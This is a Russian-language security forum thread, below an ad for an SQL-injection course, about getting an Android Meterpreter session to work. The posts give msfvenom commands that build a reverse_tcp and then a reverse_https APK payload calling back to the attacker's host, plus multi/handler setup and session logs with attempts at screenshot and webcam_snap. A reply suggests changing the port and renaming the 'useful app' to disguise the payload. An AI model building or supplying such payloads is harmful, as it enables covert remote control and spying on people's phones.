• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проблема Получение meterpreter - сессии на Andriod

vunya

Green Team
03.10.2017
26
8
BIT
0
Добрый день !
Не могу понять по какой причине рвется сессия, открытая на андроид-смарте.

Сгенерирован пэйлоад:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -a dalvik --platform android -o /root/xiaomi/abc.apk

Его забросил на свой девайс.
Заупскаю Мультихэндлер, запускаю арк на смарте и получаю вот такое:

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Sending stage (70031 bytes) to 192.168.1.103
[*] Sleeping before handling stage...
[*] Meterpreter session 16 opened (192.168.1.104:4444 -> 192.168.1.103:47010) at 2018-04-02 17:08:57 +0300
[*] 192.168.1.103 - Meterpreter session 16 closed. Reason: Died

Опции:
Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.104 yes The listen address
LPORT 4444 yes The listen port
 

vunya

Green Team
03.10.2017
26
8
BIT
0
благодарю
получилось получить сессию, правда какаую-то странную :)
ни одна команда не выполняется

meterpreter > screenshot
[-] Error running command screenshot: Rex::TimeoutError Operation timed out.
meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > ifconfig
[-] Error running command ifconfig: Rex::TimeoutError Operation timed out.
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter >
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
1) msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.104 LPORT=4444 -a dalvik --platform android -o /root/xiaomi/abc.apk
2)msf exploit(multi/handler) >
set payload android/meterpreter/reverse_https
set lport 4444
set lhost
run
3) Порт указать который ранее не использовался, если все время долбили 4444,ставим 6789 и название меняем у полезного приложения.
 
  • Нравится
Реакции: Vertigo
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!